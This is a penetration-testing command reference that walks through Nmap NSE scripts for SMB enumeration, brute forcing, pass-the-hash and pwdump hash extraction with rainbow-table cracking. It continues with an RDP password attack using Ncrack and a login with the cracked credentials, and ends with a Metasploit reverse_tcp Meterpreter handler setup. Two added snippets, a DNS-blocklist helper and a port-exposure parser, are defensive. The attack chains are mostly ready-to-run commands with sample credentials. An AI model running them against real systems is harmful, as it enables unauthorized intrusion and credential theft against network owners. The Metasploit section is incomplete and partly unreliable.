nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443,8080 192.168.101.115

Detect Zeus Botnet Hosts (by querying the ZeuS Tracker DNS blocklists at zeustracker.abuse.ch) in the Specified Network (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -v -sn -PN --script=dns-zeustracker 192.168.101.0/24

OR:
dig +short reverse_IP_address_to_check.ipbl.zeustracker.abuse.ch A
dig +short reverse_IP_address_to_check.ipbl.zeustracker.abuse.ch TXT
dig +short domain_name.uribl.zeustracker.abuse.ch A
dig +short domain_name.uribl.zeustracker.abuse.ch TXT
# The Response 127.0.0.2 means that the Domain is Listed on the ZT.
# To Check the IP address 123.124.125.126:
dig +short 126.125.124.123.ipbl.zeustracker.abuse.ch TXT
# To Check the Domain dantor777.com:
dig +short dantor777.com.uribl.zeustracker.abuse.ch A
dig +short dantor777.com.uribl.zeustracker.abuse.ch TXT
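
The dig lookups above depend on writing the IP address with its octets reversed and on reading the 127.0.0.2 answer correctly. The POSIX shell helpers below are an added example, not part of the original page: they validate the address, build the reversed ipbl name and the plain uribl name for any blocklist zone (the zone names and sample values are taken from the lookups above), and classify the answer dig returns, so the check can run from a script instead of by hand.

```shell
#!/bin/sh
# Added example, not from the original page. Helpers for DNS blocklist lookups
# of the kind shown above: reversed-octet ipbl names, plain uribl names, and
# interpretation of the answer. Nothing here touches the network; the dig call
# is left to the caller (see the comment at the bottom).

# is_ipv4: exit 0 when $1 is a dotted quad with every octet in 0..255
is_ipv4() {
  echo "$1" | awk -F. '
    NF != 4 { exit 1 }
    { for (i = 1; i <= 4; i++)
        if ($i !~ /^[0-9][0-9]?[0-9]?$/ || $i + 0 > 255) exit 1 }'
}

# reverse_ip: 123.124.125.126 -> 126.125.124.123 (the order ipbl zones expect)
reverse_ip() {
  echo "$1" | awk -F. '{ print $4 "." $3 "." $2 "." $1 }'
}

# dnsbl_name: the name to query (A or TXT) for address $1 in blocklist zone $2;
# refuses anything that is not a valid IPv4 address so a typo never becomes a
# query for an unrelated name
dnsbl_name() {
  is_ipv4 "$1" || { echo "invalid IPv4 address: $1" >&2; return 1; }
  echo "$(reverse_ip "$1").$2"
}

# uribl_name: domain lookups are not reversed, only suffixed with the zone
uribl_name() {
  echo "$1.$2"
}

# classify_answer: interpret the A record returned by dig +short; ZeuS Tracker
# answers 127.0.0.2 for listed entries and nothing at all for unlisted ones.
# Any other answer (for example a wildcard from a parked domain) is reported
# separately rather than silently treated as "listed".
classify_answer() {
  case "$1" in
    "")        echo "not listed" ;;
    127.0.0.*) echo "listed" ;;
    *)         echo "unexpected answer: $1" ;;
  esac
}

# Example of wiring it to dig (network access required, so not run here):
#   name=$(dnsbl_name 123.124.125.126 ipbl.zeustracker.abuse.ch)
#   classify_answer "$(dig +short "$name" A)"
```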

Perform a DNS Update (without Authentication):
nmap -sV --script=dns-update 192.168.1.14

Performs Password Guessing against the Apple Filing Protocol (AFP):
nmap -p 548 --script afp-brute 192.168.1.3

Shows AFP Shares and ACLs:
nmap -sV --script=afp-showmount 192.168.1.3

Listens for the LAN Sync Information Broadcasts that the Dropbox.com Client Sends Every 20 Seconds, then Prints All the Discovered Client IP Addresses, Port Numbers, Version Numbers, Display Names, and more:
nmap -sV --script=broadcast-dropbox-listener 192.168.101.0/24

Discovers EMC Networker Backup Software Servers on a LAN by Sending a Network Broadcast Query:
nmap --script broadcast-networker-discover

Scan to Check the Windows Security Mode(s) Supported (for example, if Message Signing is not supported, then Man-In-The-Middle Attacks are possible):
nmap -p445 --script=smb-security-mode 192.168.101.30

Windows OS Discovery Scan:
nmap -p445 --script=smb-os-discovery 192.168.101.30

Windows Shares Enumeration Scan (Without Specifying Credentials, by Specifying a User and a Password, or by Specifying a User and a Hash):
nmap -p445 --script=smb-enum-shares 192.168.101.50

by Specifying a User and a Password:
nmap -v -p445 --script=smb-enum-shares --script-args=smbuser=administrator,smbpass=blink182 10.0.0.0/24

by Specifying a User and a Hash with the "Pass the Hash" technique (the Hash can be Obtained by Using fgdump or pwdump6, decrypted from the SAM file, or dumped with the "smb-pwdump.nse" script):
nmap -p445 --script=smb-enum-shares --script-args=smbuser=administrator,smbhash=cd401a40ae92face50b8e4fe1911060e <target>

Password Hashes dumped this way from one server can be directly used to access other servers, without cracking them. The hash is used directly by passing a "smbhash" argument instead of "smbpass".

Brute-Force Windows Account Passwords:
nmap -p445 --script=smb-brute.nse,smb-enum-shares 10.0.0.0/24

Attempt a Brute-Force Login to a Windows Account through SMB:
nmap -p445 --script=smb-brute 192.168.101.50

Windows Users Enumeration (using both SAMR and LSA):
nmap -v -p445 --script=smb-enum-users 192.168.101.50
nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139 192.168.101.50

Windows Sessions Enumeration:
nmap -vv -p445 --script=smb-enum-sessions 192.168.101.50

Windows Processes Enumeration:
nmap -vv -p445 --script=smb-enum-processes --script-args=smbuser=test,smbpass=test 192.168.101.50

Windows System Info:
nmap -p445 --script=smb-system-info --script-args=smbuser=test,smbpass=test 192.168.101.50

5 NMAP Attack Examples

5.1 Privilege Escalation

Perform a Ping Sweep to Check the Active IP Addresses in the Subnet:
nmap -sP 192.168.101.0/24

Determine the Remote Operating System:
nmap -O -v -oN versiondetect.txt 192.168.101.0/24

OR:
nmap -p445 --script=smb-os-discovery 192.168.101.0/24

Run Users Enumeration (and grep the Interesting Info):
nmap -p445 --script=smb-enum-users 192.168.101.0/24 | grep -A1 "smb-enum-users"

Run smb-brute.nse with the Usernames Obtained by the Previous Command:
nmap -p445 --script=smb-brute --script-args=userdb=usernames.txt 192.168.101.0/24 | grep "^|_"

Perform a PWDUMP if the Found User (in this example, "test") has Access to the Password File:
nmap -p445 --script=smb-pwdump --script-args='smbuser=test,smbpass=test,rcrack=rcrack,rtable=alpha/*.rt' 192.168.101.0/24

The Downloaded Hashes are Saved in a File called "passwords.txt" and smb-brute.nse is re-run using the Hashes instead of the Default Password File:
cat passwords.txt
nmap -p445 --script=smb-brute --script-args=userdb=usernames.txt,passdb=passwords.txt 192.168.101.0/24

Run PWDUMP and Rainbow Crack against 192.168.101.20 with the Credentials of one of the Users, which will Download the Password Database from that System if that User has Sufficient Access:
nmap -p445 --script=smb-pwdump --script-args='smbuser=mary,smbhash=ADA65BF48C2CB30AE608489E290618AA,rcrack=rcrack,rtable=alpha/*.rt' 192.168.101.20

As the Previous Command Determined the Hash and Cracked the Password of the User "jim", Test the Login:
ssh jim@192.168.101.20

5.2 NMAP the Target Network

Run a port scan:
nmap -p80 www.targetcompany.com/24

Scanning for port 80, while not a guarantee, does help to find all the hosts on the target network that are running web servers. In addition to the public web server, there may be staging, development, backup, or internal web servers that are insecure or expose private information. Port 80 is also likely to be open on the firewall, because web traffic generally passes over this port.
Nmap returns the IP address (X.X.X.03) of the target, potentially allowing you to scan the related class C address space (X.X.X.x). But first you must verify the network class associated with the IP address. A popular method for doing this is to consult the whois service for the domain:
whois targetcompany.com

If you’re unable to identify the class of the network (as was the case here), the entire class C will have to be scanned:
nmap -v -p 80 X.X.X.1-254
nmap -v -p 53 -sU X.X.X.1-254
nmap -v -p 53 -sT X.X.X.1-254
nmap -v -p 25 X.X.X.1-254
nmap -v -p 110 X.X.X.1-254
nmap -v -p 143 X.X.X.1-254
nmap -v -p 139 X.X.X.1-254
nmap -v -p 445 X.X.X.1-254
nmap -v -p 3389 X.X.X.1-254
nmap -v -p 6000 X.X.X.1-254

You don't specify the protocol in the scan against port 80 (the Hyper-Text Transfer Protocol, or HTTP), because Nmap defaults to TCP (Transmission Control Protocol), and there is little reason to scan for UDP (User Datagram Protocol) on this port. In the successive scans against port 53 (the DNS port), both UDP and TCP were specified. Over this port, zone information is exchanged; in other words, the host name-to-IP address mappings for a zone are exchanged between DNS servers and routers. Although DNS traffic is primarily UDP, it switches to TCP if the message is larger than 512 bytes.
If DNS traffic is allowed through the firewall, a zone transfer might be possible. A zone transfer will be possible if the DNS server allows transfers to unauthorized requesters; however, many DNS servers now block zone transfers except to specifically authorized IP addresses.

Also check ports 25 (SMTP), 110 (POP3), and 143 (IMAP) to identify the presence of mail servers.

The checks for ports 139, 445, and 6000 are an effort to identify the operating system of the target. Ports 139 and 445 are typical Windows ports (for NT and 2000/XP, respectively), and port 6000 is a typical UNIX port (the X11 service). Identifying the target's operating system is a large step towards compromising the target, because potential avenues of attack and known vulnerabilities can then be explored.

To identify the operating system you can also run an Nmap OS detection scan (saving normal output to versiondetect.txt):
nmap -O -v -oN versiondetect.txt X.X.X.1-254

Once you have identified port 25 (SMTP) as being open, attempt to identify the version of the application by making a Telnet connection to the port:
telnet target_IP_address 25

You can also run netcat to grab the application/service banner:
nc www.targethost.com 25

The banner presented during the connection process will generally reveal all the information necessary. There are many applications for capturing application banners, including the freeware tools netcat, MingSweeper and Fport for Windows, BannerGrab and various banner grabbers at packetstormsecurity.org.

5.3 Auditing Remote Desktop Passwords with NMAP and Ncrack

The Remote Desktop Protocol could be a possible way to break into a system during a penetration test.

Use Nmap to scan the target network again to check which hosts are up, and write only the IP addresses extracted from the results to the output file:
nmap -sP X.X.X.1-254 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' >> hosts_list.txt

Run an Nmap fast scan on the active hosts, using the host list generated by the previous command as the target:
nmap -F -iL hosts_list.txt

We can also run additional scans as cross-checks to search for open RDP ports on the network and on the active servers:
nmap -p 3389 X.X.X.1-254
nmap -v -F -iL hosts_list.txt -p 3389
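The port scans in sections 5.2 and 5.3 are easier to act on as an exposure inventory than as raw screen output. As an added example that is not part of the original guide, the following Python script parses Nmap grepable (-oG) output and reports which hosts have the services these sections probe for (139, 445, 3389, 6000) open, so each can be handed to its owner for firewalling; the sample output, hostnames and addresses are constructed.

```python
import re

WATCHED_PORTS = {  # services the scans in sections 5.2 and 5.3 probe for
    139: "NetBIOS session (SMB)",
    445: "SMB (microsoft-ds)",
    3389: "RDP (ms-wbt-server)",
    6000: "X11",
}

# Constructed sample of nmap -oG output (RFC 5737 test addresses, not a real scan).
SAMPLE_GREPABLE = """\
Host: 198.51.100.1 ()\tPorts: 80/open/tcp//http///, 139/closed/tcp//netbios-ssn///, 445/filtered/tcp//microsoft-ds///\tIgnored State: closed (2)
Host: 198.51.100.2 ()\tPorts: 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///\tIgnored State: closed (3)
Host: 198.51.100.3 ()\tStatus: Down
Host: 198.51.100.4 (dev-box.example)\tPorts: 6000/open/tcp//x11///\tIgnored State: filtered (4)
# Nmap done; 4 IP addresses (3 hosts up) scanned
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(.*?\)\s+(.*)$")
# Each port record is port/state/proto/owner/service/rpcinfo/version/ (owner and rpcinfo are empty)
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)//")

def parse_grepable(text):
    """Return {ip: {(port, proto): (state, service)}}; Down hosts map to {}."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines are not Host records
        ip, rest = m.groups()
        entry = hosts.setdefault(ip, {})
        ports_field = next((f for f in rest.split("\t") if f.startswith("Ports:")), "")
        for port, state, proto, service in PORT_RE.findall(ports_field):
            entry[(int(port), proto)] = (state, service)
    return hosts

def exposure_report(hosts):
    """Map each host to its open watched ports as (port, why); clean hosts are omitted."""
    findings = {}
    for ip, ports in hosts.items():
        hits = [(port, WATCHED_PORTS[port])
                for (port, _proto), (state, _svc) in sorted(ports.items())
                if state == "open" and port in WATCHED_PORTS]
        if hits:
            findings[ip] = hits
    return findings

if __name__ == "__main__":
    for ip, hits in sorted(exposure_report(parse_grepable(SAMPLE_GREPABLE)).items()):
        print(ip, "->", ", ".join(f"{port}/tcp {why}" for port, why in hits))
```

Closed and filtered ports are kept in the parsed map but never reported, so a host whose SMB port is filtered by the firewall (198.51.100.1 in the sample) produces no finding.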

Once we have found Microsoft Terminal Services (ms-term-serv) running, we need to compile a list of valid usernames for the password brute-forcing in the following steps.
We can use username wordlists such as those you can download from these sites:
http://www.moehre.org/bruteforce.html
http://cyberwarzone.com/cyberwarfare/password-cracking-mega-collection-password-cracking-word-lists
http://www.packetstormsecurity.org/Crackers/wordlists/
http://www.theargon.com/achilles/wordlists/
http://www.openwall.com/wordlists/
http://www.outpost9.com/files/WordLists.html
Alternatively, we can use social engineering to find the names of IT staff (for example on LinkedIn or Facebook) and guess usernames from the company's naming convention or its e-mail addresses; or, again, we can use Nmap to identify an SMB server in the target network:
nmap -v -p445 X.X.X.1-254
nmap -sU -sS -p U:137,T:139 X.X.X.1-254
nmap -sS -O X.X.X.1-254 -p 139,445

then identify the SMB server information with the smb-os-discovery.nse NSE script (or with the Samba tools nmblookup and smbclient):
nmap --script smb-os-discovery.nse -p445 X.X.X.1-254
nmap -sU -sS --script smb-os-discovery.nse -p U:137,T:139 X.X.X.1-254
nmblookup -A 192.168.0.5
smbclient //servername-dt/share -I <host> -N

and then enumerate Windows users through SMB with the smb-enum-users.nse NSE script:
nmap --script smb-enum-users.nse -p445 <host>
nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139 <host>

So, in the end, let's assume we have a users.txt text file with content like the following:
dfreeman
jsmith
bhawkins
dscott
tscott
sstevens
test
klewis
bwilkinson

We also need a wordlist.txt file containing a list of passwords, one per line (as in the users.txt file): you can download password dictionaries and wordlist files from the links listed above.

Download the latest Ncrack version for your operating system and install it.
You can install binaries, or you can compile it from sources on a Linux OS.
If you want to compile it from sources, download the .tgz file from the above link, create the /usr/local/share/ncrack directory, move the compressed tarball into that directory, decompress it, enter the subdirectory created by the decompression, then configure, compile and install Ncrack (checkinstall builds a package that dpkg then installs):

mkdir /usr/local/share/ncrack
mv ncrack-0.4ALPHA.tar.gz /usr/local/share/ncrack/
cd /usr/local/share/ncrack
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
checkinstall
dpkg -i ncrack_0.4ALPHA-1_i386.deb

Run Ncrack against the Terminal Server hosts (one at a time), passing it the users.txt file and the wordlist.txt file (change the target IP address according to your environment):
ncrack -vv -U users.txt -P wordlist.txt 192.168.56.10:3389,CL=1

The Ncrack output will show which of the usernames are valid, and whether the login credentials could be cracked because the passwords for these users are weak.
We can also see in the output which user has restrictions on the host and which has more privileges (such as the permission to log on interactively to the server).
So, using the credentials of the users having the right to log on to the server, we try to access the host with a Remote Desktop client: on Windows we can use the Microsoft Remote Desktop Connection client; on Linux, Terminal Server Client, Rdesktop, Remmina (my favourite for the number of protocols supported and the features available) or PAC Manager; on Solaris, Rdesktop; on Mac, the Microsoft Remote Desktop Connection for Mac or CoRD.

You can start the client from the GUI by double-clicking its icon, or from the command line, for example with the Microsoft Remote Desktop Connection client on Windows:
%SystemRoot%\System32\mstsc.exe -v 192.168.56.10

OR with Rdesktop:
rdesktop -d domain -u username -p password -k en-us -a 16 -z -g 1024x768 -5 -P 192.168.56.10

OR with the default remote desktop client on Mac:
open rdp://jsmith:[email protected]

Once the connection opens up and we log on to the host, we're in.

5.4 Hacking Windows 7 with NMAP and Metasploit

Run an Nmap stealth (SYN) scan on the target network, skipping host discovery:
nmap -sS -v -PN 192.168.1-255

Start the exploit handler:
use exploit/multi/handler

Set the attacker IP address and port:
set LHOST 192.168.1.1
set LPORT 5555

Set the reverse TCP Meterpreter payload:
set payload windows/meterpreter/reverse_tcp

Set up the session options (ExitOnSession false keeps the handler listening after the first session):
show options
set ExitOnSession false
show options

Specify the target host IP address and port:
set RHOST 192.xx.xx.xx
set RPORT 4321

Check the settings and start exploiting:
show options
exploit